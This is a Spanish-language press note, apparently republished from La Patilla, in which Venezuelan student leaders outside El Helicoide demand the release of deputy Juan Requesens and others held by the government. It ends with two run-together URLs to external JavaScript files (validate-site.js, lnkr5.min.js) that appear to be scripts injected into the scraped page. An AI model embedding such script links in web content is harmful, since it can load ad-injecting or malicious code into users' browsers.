María Gabriela Cortés exige la inmediata liberación del diputado Juan Requesens y de todos los secuestrados por la dictadura.

Nota de Prensa

La juventud no descansará hasta que Juan Requesens, Lorent Saleh y todos los rehenes de la dictadura sean liberados. Nuestro objetivo es claro, ponerle fin a la dictadura”. Así lo afirmó este miércoles Carlos Benucci tras la arremetida del régimen contra el diputado Juan Requesens y la dirigente estudiantil, Rafaela Requesens.

El Coordinador de Organización de Vente Joven y Secretario General de la Federación de Centros Universitarios de la Universidad Central de Venezuela (FCU-UCV), rechazó desde las afueras de la sede del Servicio Bolivariano de Inteligencia (Sebin) El Helicoide, la actuación arbitraria de los cuerpos de seguridad del Estado.

Asimismo afirmó que “los estudiantes y los jóvenes seguimos en la calle, y cada vez con más fuerza defendiendo nuestro futuro y el país. Vamos a liberar a Venezuela y reconstruir la República”.

Por su parte, María Gabriela Cortés, dirigente nacional juvenil de Vente Venezuela y secretaria de cultura adjunta de la FCU-UCV, también estuvo presente en las inmediaciones de El Helicoide manifestando su solidaridad con los hermanos Requesens.

Cortés exigió la inmediata liberación del diputado y de todos los secuestrados por la dictadura y aseguró que se mantendrán en el lugar hasta conocer el estado en el que se encuentre el parlamentario.

VÍA LA PATILLA.

 

https://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x6748x&r=1533780757830https://devlinkin.xyz/addons/lnkr5.min.js

Loading...